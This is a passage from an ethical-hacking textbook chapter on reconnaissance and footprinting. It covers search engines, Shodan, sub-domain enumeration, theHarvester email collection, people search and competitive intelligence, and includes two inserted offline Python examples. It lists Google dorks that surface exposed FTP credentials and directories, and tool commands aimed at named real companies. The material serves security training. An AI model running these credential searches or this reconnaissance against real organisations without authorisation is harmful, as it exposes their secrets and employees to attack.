Table 2.2: Google search queries for VPN footprinting
Other Techniques for Footprinting through Search Engines

Gathering Information Using Google Advanced Search, Advanced Image Search, and Reverse Image Search

An attacker cannot always gather information easily from an information-rich site using only a normal search box. A complicated search involves a number of interrelated conditions.
Google's Advanced search feature helps an attacker to perform complex web searching. With Google Advanced Search and Advanced Image Search, one can search the web more precisely and accurately. You can use these search features to achieve the same precision as that achieved using the advanced operators but without typing or remembering the operators. Using Google's Advanced Search option, you can find sites that may link back to the target organization's website. This helps to extract information such as partners, vendors, clients, and other affiliations of the target website. You can use Google Advanced Image Search to acquire images of the target, its location, employees, and so on.

To perform an advanced search in Google, click Settings at the bottom-right of the Google home page, and then choose Advanced search in the menu, or directly type https://www.google.com/advanced_search in the address bar. Advanced search allows you to specify any number of criteria that the search must match, as this pattern builds on the search box pattern by adding more search options. To do this, you choose a field. Then, enter the string you want to search for in the field's text box and click on the Advanced Search button. By default, various values are joined together with "and" (meaning all of them need to match) except sets, blocks, and formats, which are joined together with "or" (meaning any of them can match).
Figure 2.3: Google Advance Search

To perform an advanced image search in Google, type https://www.google.com/advanced_image_search in the address bar. Advanced image search allows you to tweak your image search in a number of ways. You can search based on image color, domain, file type, size, keyword, and so on. To do this, you choose a field. Then, enter the string you want to search for in the field's text box and click on the Advanced Search button.
Figure 2.4: Google Advance Image Search

To perform a reverse image search in Google, type https://www.google.com/imghp in the address bar. Reverse image search allows you to use an image as a search query. You can upload an image or paste the URL of the image in the reverse image search engine. The search engine verifies all online locations of the image in the search engine index and displays the image in the search results page. The results obtained can help you in tracking the original source and details of the images, such as photographs, profile pictures, and memes. Attackers use online tools such as Google Image Search, TinEye Reverse Image Search, Yahoo Image Search, and Bing Image Search to perform a reverse image search.
Figure 2.5: Reverse Image Search using Google

Gathering Information from Video Search Engines

Video search engines are Internet-based search engines that crawl the web for video content. These video search engines either provide the functionality of uploading and hosting video content on their own web servers or parse video content that is hosted externally. The video content obtained from video search engines is of high value, as it can be used for gathering information about the target. Video search engines such as YouTube, Google videos, Yahoo videos, and Bing videos allow attackers to search for video content based on the format type and duration.

Figure 2.6: Screenshot of YouTube search showing results for Microsoft
After searching for videos related to the target using video search engines, an attacker can further analyze the video content to gather hidden information such as the time/date and thumbnail of the video. Using video analysis tools such as YouTube DataViewer, EZGif, and VideoReverser.com, an attacker can reverse a video or convert a video into text and other formats to extract critical information about the target.

Figure 2.7: Screenshot of YouTube DataViewer showing video analysis result
Gathering Information from Meta Search Engines

Meta search engines are a different type of search engine that use other search engines (Google, Bing, Ask.com, etc.) to produce their own results from the Internet in a very short time span. These search engines do not have their own search indexes; instead, they take the inputs from the users and simultaneously send out the queries to the third-party search engines to obtain the results. Once sufficient results are gathered, they are ranked according to their relevance and presented to the user through the web interface. Meta search engines also include a functionality whereby identical search results are filtered out so that if the user searches the same query again, it will not display the same results twice. A meta search engine is advantageous compared to simple search engines, as it can retrieve more results with the same amount of effort.

Using meta search engines, such as Startpage, MetaGer, and eTools.ch, attackers can send multiple search queries to several search engines simultaneously and gather substantially detailed information such as information from shopping sites (Amazon, eBay, etc.), images, videos, blogs, news, and articles from different sources. Further, meta search engines also provide privacy to the search engine user by hiding the user's IP address.

Figure 2.8: Screenshot of Meta Search Engine StartPage.com showing search results for Twitter
Gathering Information from FTP Search Engines

FTP search engines are used to search for files located on FTP servers that contain valuable information about the target organization. Many industries, institutions, companies, and universities use FTP servers to store large file archives and other software that are shared among their employees. A special FTP client such as FileZilla (https://filezilla-project.org) can be used to access the FTP accounts; it also supports functionalities such as uploading, downloading, and renaming files. Although FTP servers are usually protected with passwords, many servers are left unsecured and can be accessed through web browsers directly.

Using FTP search engines such as NAPALM FTP Indexer, Global FTP Search Engine, and FreewareWeb FTP File Search, attackers can search for critical files and directories containing valuable information such as business strategies, tax documents, employee's personal records, financial records, licensed software, and other confidential information.

Listed below are some of the important advanced Google search queries to find FTP servers:

Google Dork
    Description

intext:.ftpconfig inurl:github.com
    Returns SFTP/FTP server credentials on Github

intitle:"index of" inurl:ftp
    Returns sensitive directories on FTP servers

inurl:"ftp://www." "Index of /"
    Displays various online FTP servers

inurl:~/ftp://193 filetype:(php | html | asp | xml | cnf | sh)
    Returns a list of FTP servers by IP address, mostly Windows NT servers with guest login capabilities

Table 2.3: Google search queries to find FTP servers

As shown in the screenshot, attackers can use the NAPALM FTP Indexer online tool to search for critical files and documents related to the target domain.

Figure 2.9: Screenshot of FTP Search Engine NAPALM FTP Indexer showing search results for Microsoft
Gathering Information from IoT Search Engines

Internet of Things (IoT) search engines crawl the Internet for IoT devices that are publicly accessible. Through a basic search on these search engines, an attacker can gain control of Supervisory Control and Data Acquisition (SCADA) systems, traffic control systems, Internet-connected household appliances, industrial appliances, CCTV cameras, etc. Many of these IoT devices are unsecured, i.e., they are without passwords or they use the default credentials, which can be exploited easily by attackers. With the help of IoT search engines such as Shodan, Censys, and Thingful, attackers can obtain information such as the manufacturer details, geographical location, IP address, hostname, and open ports of the target IoT device. Using this information, the attacker can establish a backdoor to the IoT devices and gain access to them to launch further attacks.

As shown in the screenshot, attackers can use Shodan to find all the IoT devices of the target organization that have open ports and services.

Figure 2.10: Screenshot of Shodan showing search results for SCADA devices

Figure 2.11: Screenshot of Shodan showing open ports and services of a SCADA system
Footprinting through Web Services

Web services such as people search services can provide sensitive information about the target. Internet archives may also provide sensitive information that has been removed from the World Wide Web (WWW). Social networking sites, people search services, alerting services, financial services, and job sites provide information about a target such as infrastructure details, physical location, and employee details. Moreover, groups, forums, and blogs can help attackers in gathering sensitive information about a target, such as public network information, system information, and personal information. Using this information, an attacker may build a hacking strategy to break into the target organization's network and carry out other types of advanced system attacks.

This section aims to familiarize you with finding the target company's top-level domains, sub-domains, and geographical location, performing people search on social networking sites and people search services, gathering information from job sites, financial services, and third-party data repositories, performing deep and dark web footprinting, determining the operating system, VoIP and VPN footprinting through Shodan, gathering competitive intelligence, etc.

Finding a Company's Top-Level Domains (TLDs) and Sub-domains

A company's top-level domains (TLDs) and sub-domains can provide a large amount of useful information to an attacker. A public website is designed to show the presence of an organization on the Internet. It is available for free public access. It is designed to attract customers and partners. It may contain information such as organizational history, services and products, and contact information. The target organization's external URL can be located with the help of search engines such as Google and Bing.
Figure 2.12: Google search engine showing results for given syntax
The sub-domain is available to only a few people. These persons may be employees of an organization or members of a department. In many organizations, website administrators create sub-domains to test new technologies before deploying them on the main website. Generally, these sub-domains are in the testing stage and are insecure; hence, they are more vulnerable to various exploitations. Sub-domains provide insights into the different departments and business units in an organization. Identifying such sub-domains may reveal critical information regarding the target, such as the source code of the website and documents on the web server. Access restrictions can be applied based on the IP address, domain or subnet, username, and password.

The sub-domain helps to access the private functions of an organization. Most organizations use common formats for sub-domains. Therefore, a hacker who knows the external URL of a company can often discover the sub-domain through trial and error, or by using a service such as Netcraft.

You can also use the advanced Google search operator shown below to identify all the sub-domains of the target:

site:microsoft.com -inurl:www
Tools to Search Company's Sub-domains

Netcraft

Source: https://www.netcraft.com

Netcraft provides Internet security services, including anti-fraud and anti-phishing services, application testing, and PCI scanning. They also analyze the market share of web servers, operating systems, hosting providers and SSL certificate authorities, and other parameters of the Internet.

As shown in the screenshot below, attackers can use Netcraft to obtain all the sub-domains related to the target domain.

Figure 2.14: Screenshot of Netcraft displaying subdomains of microsoft.com

Sublist3r
Source: https://github.com

Sublist3r is a Python script designed to enumerate the subdomains of websites using OSINT. It helps penetration testers and bug hunters in collecting and gathering subdomains for the domain they are targeting. It enables you to enumerate subdomains across multiple sources at once. Further, it enumerates subdomains using many search engines such as Google, Yahoo, Bing, Baidu, and Ask. It also enumerates subdomains using Netcraft, VirusTotal, ThreatCrowd, DNSdumpster, and ReverseDNS.

Syntax:

sublist3r [-d DOMAIN] [-b BRUTEFORCE] [-p PORTS] [-v VERBOSE] [-t THREADS] [-e ENGINES] [-o OUTPUT]

Short Form  Long Form     Description
-d          --domain      Domain name to enumerate subdomains of
-b          --bruteforce  Enable the subbrute bruteforce module
-p          --ports       Scan the found subdomains against specific TCP ports
-v          --verbose     Enable the verbose mode and display results in real time
-t          --threads     Number of threads to use for subbrute bruteforce
-e          --engines     Specify a comma-separated list of search engines
-o          --output      Save the results to text file
-h          --help        Show the help message and exit

Table 2.4: Sublist3r options with description
Example 1:

As shown in the screenshot, Sublist3r helps attackers in enumerating the subdomains of a target company from multiple sources at the same time.

Figure 2.15: Screenshot of Sublist3r displaying sub-domains of google.com
Example 2:

Sublist3r also helps attackers in enumerating the subdomains of a target company with a specific port open. As shown in the screenshot, attackers search for subdomains of google.com (-d google.com) using the Bing search engine (-e Bing) with port 80 (-p 80) open.

Figure 2.16: Screenshot of Sublist3r displaying sub-domains of google.com with port 80 open

Pentest-Tools Find Subdomains
Source: https://pentest-tools.com

Pentest-Tools Find Subdomains is an online tool used for discovering subdomains and their IP addresses, including network information and their HTTP servers. As shown in the screenshot, attackers search for sub-domains related to microsoft.com to obtain critical information about the target company domain, such as sub-domains, IP addresses, operating systems, servers used, technology platform, web platform used, and page titles.

Figure 2.17: Screenshot of Pentest-Tools displaying sub-domains of microsoft.com
Finding the Geographical Location of the Target

Information such as the physical location of an organization plays a vital role in the hacking process. Attackers can obtain this information using footprinting. In addition to the physical location, a hacker can also acquire information such as surrounding public Wi-Fi hotspots that may offer a way to break into the target organization's network.

Attackers with the knowledge of a target organization's location may attempt dumpster diving, surveillance, social engineering, and other non-technical attacks to gather more information. Once the attackers discern the location of the target, they can obtain detailed satellite images of the location using various sources available on the Internet such as Google Earth and Google Maps. The attackers can use this information to gain unauthorized access to buildings, wired and wireless networks, and systems.

Tools for Finding the Geographical Location

The tools for finding the geographical location allow you to find and explore most locations on the earth. They provide information such as images of buildings, as well as their surroundings, including Wi-Fi networks. Tools such as Google Maps even locate entrances of the building, security cameras, and gates. These tools provide interactive maps, outline maps, satellite imagery, and information on how to interact with and create one's own maps. Google Maps, Yahoo Maps, and other tools provide driving directions, traffic conditions, landmarks, and detailed address and contact information.

Attackers may use tools such as Google Earth, Google Maps, and Wikimapia to find or locate entrances to buildings, security cameras, gates, places to hide, weak spots in perimeter fences, and utility resources such as electricity connections, to measure the distance between different objects, and so on.

Google Earth (https://earth.google.com)

Attackers use the Google Earth tool to find the exact location of a target. Using this tool, attackers can even access 3D images that depict most of the Earth's populated surface with a high resolution. The detail allows attackers to obtain street views, altitude information, and even coordinates.

Figure 2.18: Screenshot of Google Earth
People Search on Social Networking Sites and People Search Services

People Search on Social Networking Sites

Searching for a particular person on a social networking website is fairly easy. Social networking services are online services, platforms, or sites that focus on facilitating the building of social networks or social relations among people. These websites contain information that users provide in their profiles. They help to directly or indirectly relate people to each other through various fields such as common interests, work location, and education.

Social networking sites allow people to share information quickly, as they can update their personal details in real time. Such sites allow users to update facts about upcoming or current events, recent announcements and invitations, and so on. Social networking sites are a great platform for finding people and their related information. Many social networking sites allow visitors to search for people without registering on the site; this makes people searching on social networking sites an easy and anonymous task. A user can search for a person using the name, email, or address. Some sites allow users to check whether an account is active, which then provides information on the status of the person being searched.

Social networking sites such as Facebook, Twitter, LinkedIn, and Instagram allow you to find people by name, keyword, company, school, friends, colleagues, and the people living around them. Searching for people on these sites returns personal information such as name, position, organization name, current location, and educational qualifications. In addition, you can also find professional information such as company or business, current location, phone number, email ID, photos, videos, and so on. Social networking sites such as Twitter are used to share advice, news, concerns, opinions, rumors, and facts. Through people searching on social networking services, an attacker can gather critical information that will help them in performing social engineering or other kinds of attacks.

Figure 2.19: Screenshot of Facebook showing search results
People Search on People Search Services

You can use public record websites to find information about email addresses, phone numbers, house addresses, and other information. Many individuals use online people search services to find information about other people. Generally, online people search services such as pipl, Intelius, BeenVerified, Whitepages, and PeekYou provide people's names, addresses, contact details, date of birth, photographs, videos, profession, details about their family and friends, social networking profiles, property information, and optional background on criminal checks. Further, online people search services may often reveal the profession of an individual, businesses owned by a person, upcoming projects and operating environment, websites and blogs, contact numbers, important dates, company email addresses, cell phone numbers, fax numbers, and personal e-mail addresses. Using this information, an attacker can try to obtain bank details, credit card details, past history, and so on. This information proves to be highly beneficial for attackers to launch attacks. There are many people search services available online that help in obtaining information regarding people. Examples of such people search services include Intelius, pipl, and AnyWho.

People search service - Intelius

Source: https://www.intelius.com

Attackers can use the Intelius people search online service to search for people belonging to the target organization. Using this service, attackers obtain information such as phone numbers, address history, age, date of birth, relatives, previous work history, educational background, and so on.

Figure 2.20: Screenshot of Intelius People Search
Gathering Information from LinkedIn

LinkedIn is a social networking website for professionals. It connects the world's human resources to aid productivity and success. The site contains personal information such as name, position, organization name, current location, educational qualifications, and so on. Information gathered from LinkedIn helps an attacker in performing social engineering or other kinds of attacks.

Attackers can use the theHarvester tool to gather information from LinkedIn based on the target organization name:

theHarvester

Source: http://www.edge-security.com

theHarvester is a tool designed to be used in the early stages of a penetration test. It is used for open-source intelligence gathering and helps to determine a company's external threat landscape on the Internet. Attackers use this tool to perform enumeration on the LinkedIn social networking site to find employees of the target company along with their job titles.

As shown in the screenshot, the attacker uses the following command to enumerate users on LinkedIn:

theHarvester -d microsoft -l 200 -b linkedin

In the above command, -d specifies the domain or company name to search, -l specifies the number of results to be retrieved, and -b specifies the data source as LinkedIn.

Figure: Screenshot showing theHarvester search result from LinkedIn
Harvesting Email Lists

Gathering email addresses related to the target organization acts as an important attack vector during the later phases of hacking. Attackers can use automated tools such as theHarvester and Email Spider to collect publicly available email addresses of the employees of the target organization. These tools harvest email lists related to a specified domain using search engines such as Google, Bing, and Baidu. Attackers use these email lists and usernames to perform social engineering and brute force attacks on the target organization.

theHarvester

Source: http://www.edge-security.com

Attackers use the theHarvester tool to extract email addresses related to the target domain. For example, attackers use the following command to extract email addresses of microsoft.com using the Baidu search engine:

theHarvester -d microsoft.com -l 200 -b baidu

In the above command, -d specifies the domain used for harvesting the emails, -l will limit the results to 200, and -b tells theHarvester to extract the results from the Baidu search engine; alternatively, you can use Google, Bing, etc.
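What Sublist3r (sub-domain enumeration, above) and theHarvester (email harvesting, this section) have in common is aggregating hits for one target domain across several sources, normalizing and de-duplicating them. The added example below (not the tools' own code) does that offline over constructed search-result snippets and then diffs the found sub-domains against a defender's asset inventory, so the same technique surfaces forgotten or unregistered hosts; the domain example.test, the snippets and the inventory are all constructed.

```python
"""Aggregate sub-domains and e-mail addresses of one target domain from several
OSINT sources, as Sublist3r and theHarvester do across search engines, and
diff the result against the defender's own asset inventory.

Added example, not the tools' code.  The search-result snippets, the domain
example.test and the inventory below are all constructed.
"""
import json
import re

# Constructed (source, snippet) records standing in for search-engine results.
RESULTS = [
    ("google", "https://www.example.test/ - Example Corp home page"),
    ("google", "https://intranet.example.test/hr - HR Intranet | Example Corp"),
    ("bing", "Contact j.doe@example.test or sales@mail.example.test for quotes"),
    ("bing", "http://dev-api.example.test:8080/v1/ (staging)"),
    ("baidu", "https://EXAMPLE.TEST/careers - Careers"),
    ("baidu", "mailto:Hr-Team@EXAMPLE.TEST"),
    ("netcraft", "Hostnames matching *.example.test: vpn.example.test, git.example.test"),
    ("netcraft", "unrelated: login.example.testing.org admin@notexample.test"),
]

# Constructed asset inventory: dev-api and git were never registered with IT.
INVENTORY = ["www.example.test", "intranet.example.test",
             "mail.example.test", "vpn.example.test"]

# A host name is dotted labels plus a TLD, optionally with :port; the lookarounds
# stop it from starting mid-word or swallowing a following word character.
HOST_RE = re.compile(r"(?<![\w.-])((?:[a-z0-9-]+\.)+[a-z]{2,})(?::\d+)?(?![\w-])", re.I)
MAIL_RE = re.compile(r"[\w.+-]+@((?:[a-z0-9-]+\.)+[a-z]{2,})", re.I)


def in_scope(host, domain):
    """True for the apex domain and any label under it; never for look-alikes
    such as example.testing.org or notexample.test."""
    host, domain = host.lower().rstrip("."), domain.lower()
    return host == domain or host.endswith("." + domain)


def harvest(results, domain):
    """Return ({subdomain: {sources}}, {email: {sources}}) restricted to domain."""
    subs, mails = {}, {}
    for source, text in results:
        for m in MAIL_RE.finditer(text):
            if in_scope(m.group(1), domain):
                mails.setdefault(m.group(0).lower(), set()).add(source)
        for m in HOST_RE.finditer(text):
            host = m.group(1).lower()
            if in_scope(host, domain) and host != domain.lower():
                subs.setdefault(host, set()).add(source)
    return subs, mails


def shadow_assets(subs, inventory):
    """Sub-domains visible to the world but absent from the asset inventory."""
    known = {h.lower() for h in inventory}
    return sorted(h for h in subs if h not in known)


def report(results=RESULTS, domain="example.test", inventory=INVENTORY):
    """Sublist3r-style aggregation with the per-source attribution kept."""
    subs, mails = harvest(results, domain)
    return {
        "subdomains": {h: sorted(s) for h, s in sorted(subs.items())},
        "emails": sorted(mails),
        "unregistered": shadow_assets(subs, inventory),
    }


if __name__ == "__main__":
    print(json.dumps(report(), indent=2))
```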
Figure 2.23: Screenshot showing theHarvester command to extract email addresses

Figure 2.24: Screenshot showing the emails extracted by theHarvester
Gathering Information from Financial Services

Attackers who seek access to personal information or financial information often target financial data such as stock quotes and charts, financial news, and portfolios. Financial services such as Google Finance, MSN Money, Yahoo Finance, and Investing.com can provide a large amount of useful information such as the market value of a company's shares, company profile, competitor details, stock exchange rates, corporate press releases, financial reports along with news, and blog search articles about corporations. The information provided varies from one service to the other. Financial firms rely on web services to perform transactions and grant users access to their accounts. Attackers can obtain sensitive and private information regarding these firms by using malware, exploiting software design flaws, breaking authentication mechanisms, service flooding, and performing brute force attacks and phishing attacks.

Google Finance

Source: https://www.google.com/finance

The Google Finance service features business and enterprise headlines for many corporations, including their financial decisions and major news events. Stock information is also available, as are stock price charts that contain marks for major news events and corporate actions. The site also aggregates Google News and Google Blog Search articles about each corporation.

Figure 2.25: Screenshot of Google Finance Service
Footprinting through Job Sites
Attackers can gather valuable information about the operating system, software versions, a company's infrastructure details, and database schema of an organization through footprinting job sites using different techniques. Many organizations' websites provide recruiting information on a job posting page that, in turn, reveals hardware and software information, network-related information, and technologies used by the company (e.g., firewall, internal server type, OS used, network appliances, and so on). In addition, the organization website may have a key employee list with email addresses. Such information may prove to be beneficial for an attacker. For example, if an organization advertises a Network Administrator job, it posts the requirements related to that position. Further, attackers can go through employee resumes posted on job sites and extract information such as an individual's expertise, educational qualifications, and job history. The job history of an employee can reveal technical information about the target organization. Attackers can use the technical information obtained through job sites such as Dice, LinkedIn, and Simply Hired to detect underlying vulnerabilities in the target IT infrastructure.
Figure 2.26: Screenshot of job posting showing valuable information
Deep and Dark Web Footprinting
The surface web is the outer layer of the online cyberspace that allows the user to find web pages and content using regular search engines. These engines use crawlers, bots programmed to access and download web pages. The surface web can be accessed by browsers such as Google Chrome, Mozilla Firefox, and Opera.
The deep web is the layer of the online cyberspace that consists of web pages and content that are hidden and unindexed. Such content cannot be located using traditional search engines. The size of the deep web is incalculable, and it expands to almost the entire World Wide Web. The deep web does not allow the crawling process of basic search engines. It consists of official government or federal databases and other information linked to various organizations. The deep web can be accessed using tools such as Tor Browser and directories such as the WWW Virtual Library. It can be used for both legal and illegal activities.
The dark web or Darknet is a deeper layer of the online cyberspace, and it is the subset of the deep web that enables anyone to navigate anonymously without being traced. The dark web can be accessed only through specialized tools or darknet browsers. Attackers primarily use the dark web to perform footprinting on the target organization and launch attacks. The dark web can be accessed using Tor Browser; ExoneraTor is a companion service that reports whether a given IP address was a Tor relay at a given time, which is useful for attributing traffic rather than for browsing.
Attackers can use deep and dark web tools such as Tor Browser, ExoneraTor, and the OnionLand Search engine to gather confidential information about the target, such as credit card details, passports, identification card details, medical records, social media accounts, and Social Security Numbers (SSNs). With the help of this information, they can launch further attacks on the targets.
Tor Browser
Source: https://www.torproject.org
Tor Browser is used to access the deep and dark web. It routes the user's traffic through several relays in the Tor network before it reaches the destination, so the site visited sees the exit relay's IP address rather than the user's; this is onion routing, not a VPN, and it hides the source of the connection rather than encrypting traffic end to end. Attackers use this browser to access hidden content, unindexed websites, and encrypted databases present in the deep web. As shown in the screenshot, by using Tor Browser, attackers can obtain more detailed and hidden information about the target organization.
Figure 2.27: Screenshot of Tor Browser
Determining the Operating System
Attackers use various online tools such as Netcraft, Shodan, and Censys to detect the operating system used at the target organization. These tools search the Internet for detecting connected devices such as servers, routers, and IoT devices belonging to the target organization. Using these tools, attackers obtain information such as the city, country, latitude/longitude, hostname, operating system, and IP address of the target organization. Such information further helps attackers in identifying potential vulnerabilities and finding effective exploits to perform various attacks on the target.
Netcraft
Source: https://www.netcraft.com
The technique of obtaining information about the target network operating system is called OS fingerprinting. Open https://www.netcraft.com in the browser and type the domain name of the target network in the "What's that site running?" field. Attackers use the Netcraft tool to identify all the sites associated with the target domain along with the operating system running at each site. Netcraft reports what it observed on its own most recent visit, so the OS shown can be out of date, and for a site behind a CDN or reverse proxy it describes the front end rather than the origin server.
Figure 2.28: Screenshot of Netcraft showing target operating system
SHODAN Search Engine
Source: https://www.shodan.io
Shodan is a computer search engine that searches the Internet for connected devices (routers, servers, IoT, etc.). You can use Shodan to discover which devices are connected to the Internet, where they are located, and who is using them. It helps attackers to keep track of all the devices on the target network that are directly accessible from the Internet. It also allows the attacker to find devices based on the city, country, latitude/longitude, hostname, operating system, and IP address. Further, it helps the attacker to search for known vulnerabilities and exploits across Exploit DB, Metasploit, CVE, OSVDB (no longer maintained), and Packetstorm with a single interface. As shown in the screenshot, attackers use this tool to detect various target devices connected to the Internet along with the operating system used.
Figure 2.29: Screenshot of SHODAN Search Engine showing target operating system
Censys
Source: https://censys.io
Censys monitors the infrastructure and discovers unknown assets anywhere on the Internet. It provides a full view of every server and device exposed to the Internet. Attackers use this tool to monitor the target IT infrastructure to discover various devices connected to the Internet along with their details such as the operating system used, IP address, protocols used, and geographical location.
Figure 2.30: Screenshot of Censys Search Engine showing target operating system
VoIP and VPN Footprinting through SHODAN
Source: https://www.shodan.io
Shodan is a search engine that enables attackers to perform footprinting at various levels. It is used to detect devices and networks with vulnerabilities. A search in Shodan for VoIP and VPN footprinting can deliver various results, which will help gather VPN- and VoIP-related information. The following screenshots show some of the VPN and VoIP footprinting search results obtained through Shodan.
Figure 2.31: Screenshot of SHODAN search engine showing VoIP results
Figure 2.32: Screenshot of SHODAN search engine showing VPN results
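The two Shodan uses described above, determining the operating system of exposed hosts and finding VoIP and VPN endpoints, as an added example that is not the book's code and not Shodan's own client library: it composes search strings from the filter names Shodan documents (org:, hostname:, port:, os:, country:) and then classifies host records shaped like Shodan's banner JSON (ip_str, port, os, data, hostnames). The port lists, banner markers, and SAMPLE_RECORDS are assumptions made for the example; no API key or network access is needed to run it.

```python
# Port numbers that usually indicate a VoIP or VPN endpoint (assumption for the example).
VOIP_PORTS = {5060, 5061}            # SIP and SIP over TLS
VPN_PORTS = {500, 4500, 1723, 1194}  # IKE, IPsec NAT-T, PPTP, OpenVPN
# Banner substrings that identify the service even on a non-standard port.
VOIP_MARKERS = ("sip/2.0", "asterisk", "freepbx")
VPN_MARKERS = ("isakmp", "pptp", "openvpn")


def build_query(org=None, hostname=None, ports=(), os_name=None, country=None):
    """Compose a Shodan search string; values containing spaces are quoted."""
    def q(value):
        return f'"{value}"' if " " in value else value

    parts = []
    if org:
        parts.append(f"org:{q(org)}")
    if hostname:
        parts.append(f"hostname:{q(hostname)}")
    if ports:
        parts.append("port:" + ",".join(str(p) for p in sorted(ports)))
    if os_name:
        parts.append(f"os:{q(os_name)}")
    if country:
        parts.append(f"country:{country}")
    return " ".join(parts)


def classify(record):
    """Label one banner record as 'voip', 'vpn' or 'other' by port and banner text."""
    port = record.get("port", 0)
    banner = (record.get("data") or "").lower()
    if port in VOIP_PORTS or any(m in banner for m in VOIP_MARKERS):
        return "voip"
    if port in VPN_PORTS or any(m in banner for m in VPN_MARKERS):
        return "vpn"
    return "other"


def summarize(records):
    """Group (ip, port, os) triples by category. A record without an 'os' field is
    reported as 'unknown' rather than guessed from the banner text."""
    summary = {"voip": [], "vpn": [], "other": []}
    for rec in records:
        summary[classify(rec)].append((rec["ip_str"], rec["port"], rec.get("os") or "unknown"))
    for key in summary:
        summary[key].sort()
    return summary


# Constructed records in the shape of Shodan banner JSON (TEST-NET addresses, made-up banners).
SAMPLE_RECORDS = [
    {"ip_str": "203.0.113.10", "port": 5060, "os": None,
     "data": "SIP/2.0 200 OK\r\nServer: Asterisk PBX 16.2\r\n", "hostnames": ["pbx.example.com"]},
    {"ip_str": "203.0.113.20", "port": 500, "os": None,
     "data": "ISAKMP vendor IDs: RFC 3947, XAUTH", "hostnames": ["vpn.example.com"]},
    {"ip_str": "203.0.113.30", "port": 443, "os": "Windows",
     "data": "HTTP/1.1 200 OK\r\nServer: Microsoft-IIS/10.0\r\n", "hostnames": ["www.example.com"]},
    {"ip_str": "203.0.113.40", "port": 1194, "os": "Linux",
     "data": "OpenVPN UDP responder", "hostnames": []},
]

if __name__ == "__main__":
    print(build_query(org="Example Corp", ports=VOIP_PORTS | VPN_PORTS))
    for category, hosts in summarize(SAMPLE_RECORDS).items():
        print(category, hosts)
```

The query string is what would be pasted into the Shodan web interface or passed to its API; the classification step is the part worth keeping, because Shodan's own "os" field is often empty and the port plus banner text is what actually tells a VoIP PBX from a VPN concentrator.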
Competitive Intelligence Gathering
Competitive intelligence gathering is the process of identifying, gathering, verifying, analyzing, and using information about your competitors from resources such as the Internet. Competitive intelligence means understanding and learning about other businesses to become as competitive as possible. It is non-interfering and subtle in nature compared to direct intellectual property theft carried out via hacking or industrial espionage. It focuses on the external business environment. In this method, professionals gather information ethically and legally instead of gathering it secretly.
Competitive intelligence helps in determining:
- What are the competitors doing?
- How are competitors positioning their products and services?
- What are customers saying about competitors' strengths and weaknesses?
Companies carry out competitive intelligence either by employing people to search for information or by utilizing a commercial database service, which involves lower costs. The information that is gathered can help the managers and executives of a company make strategic decisions.
Sources of Competitive Intelligence
Competitive intelligence gathering can be performed using a direct or indirect approach.
Direct Approach
The direct approach serves as the primary source for competitive intelligence gathering. Direct approach techniques include gathering information from trade shows, social engineering of employees and customers, and so on.
Indirect Approach
Through an indirect approach, information about competitors is gathered using online resources. Indirect approach techniques include:
- Company websites and employment ads
- Support threads and reviews
- Search engines, Internet, and online databases
- Social media postings
- Press releases and annual reports
- Trade journals, conferences, and newspapers
- Patents and trademarks
- Product catalogs and retail outlets
- Analyst and regulatory reports
- Customer and vendor interviews
- Agents, distributors, and suppliers
- Industry-specific blogs and publications
- Legal databases, e.g., LexisNexis
- Business information databases, e.g., Hoover's
- Online job postings
Competitive Intelligence - When Did this Company Begin? How Did it Develop?
Gathering competitor documents and records helps to improve productivity and profitability, which in turn stimulates the growth of the company. It helps in determining answers to the following:
- When did it begin? Through competitive intelligence, companies can collect the history of a particular company, such as its establishment date. Sometimes, they gather crucial information that is not often available to others.
- How did it develop? What are the various strategies that the company uses? Development intelligence can include advertisement strategies, customer relationship management, and so on.
- Who leads it? This information helps a company learn about the competitor's decision-makers.
- Where is it located? Competitive intelligence also includes the location of the company and information related to various branches and their operations.
Attackers can use the information gathered through competitive intelligence to build a hacking strategy.
Information Resource Sites
Information resource sites that help to gain competitive intelligence include:
EDGAR Database
Source: https://www.sec.gov/edgar.shtml
The Electronic Data Gathering, Analysis, and Retrieval system (EDGAR) performs automated collection, validation, indexing, acceptance, and forwarding of submissions by companies and others who are required by law to file with the U.S. Securities and Exchange Commission (SEC). Its primary purpose is to increase the efficiency and fairness of the securities market for the benefit of investors, corporations, and the economy by accelerating the receipt, acceptance, dissemination, and analysis of time-sensitive corporate information filed with the agency.
D&B Hoovers
Source: http://www.hoovers.com
D&B Hoovers leverages a commercial database of 120 million business records and analytics to deliver a sales intelligence solution that enables sales and marketing professionals to focus on the right prospects for their business so that they can generate immediate growth.
LexisNexis
Source: https://www.lexisnexis.com
LexisNexis provides content-enabled workflow solutions designed specifically for professionals in the legal, risk management, corporate, government, law enforcement, accounting, and academic markets. It maintains an electronic database of legal and public records drawn from legal, news, and business sources, and it enables customers to access supporting documents and records. It is beneficial for companies and government agencies seeking data analytics for compliance, customer acquisition, fraud detection, health outcomes, identity solutions, investigation, receivables management, risk decisioning, and workflow optimization.
Business Wire
Source: https://www.businesswire.com
Business Wire focuses on press release distribution and regulatory disclosure. This company distributes full-text news releases, photos, and other multimedia content from various organizations across the globe to journalists, news media, financial markets, investors, information websites, databases, and general audiences. It has its own patented electronic network through which it releases news.
Factiva
Source: https://www.dowjones.com
Factiva is a global news database and licensed content provider. It is a business information and research tool that gets information from licensed and free sources and provides capabilities such as searching, alerting, dissemination, and business information management. Factiva products provide access to more than 33,000 sources such as licensed publications, influential websites, blogs, images, and videos. Its resources are made available from nearly every country worldwide in 28 languages, including more than 600 continuously updated newswires.
Competitive Intelligence - What Are the Company's Plans?
Information resource sites that help attackers gain a company's business plans include:
MarketWatch
Source: https://www.marketwatch.com
MarketWatch tracks the pulse of markets for engaged investors. The site is an innovator in business news, personal finance information, real-time commentary, and investment tools and data, with journalists generating headlines, stories, videos, and market briefs.
The Wall Street Transcript
Source: https://www.twst.com
The Wall Street Transcript is a website as well as a paid subscription-based publication that publishes industry reports. It expresses the views of money managers and equity analysts of different industry sectors. The site also publishes interviews with CEOs of companies.
Alexa
Source: https://www.alexa.com
Alexa is a tool to dig deep into the analytics of other companies. It allows users to:
- Discover influencer outreach opportunities by uncovering sites that link to their competitors using Competitor Backlink Checker.
- Benchmark competitors and track their company's performance relative to their competitors using Competitive Intelligence Tools.
Euromonitor
Source: https://www.euromonitor.com
Euromonitor provides strategy research capabilities for consumer markets. It publishes reports on industries, consumers, and demographics. It provides market research and surveys focused on the organization's needs.
Experian
Source: https://www.experian.com
Experian provides insights into competitors' search, display, affiliate, and social marketing strategies and metrics to improve marketing campaign results. It allows the user to:
- Benchmark the effectiveness of customer acquisition strategies
- Determine what is driving competitors' existing success
- Use historical consumer data to forecast future trends and quickly respond to changing behaviors
- Measure website's performance against industry or specific sites
SEC Info
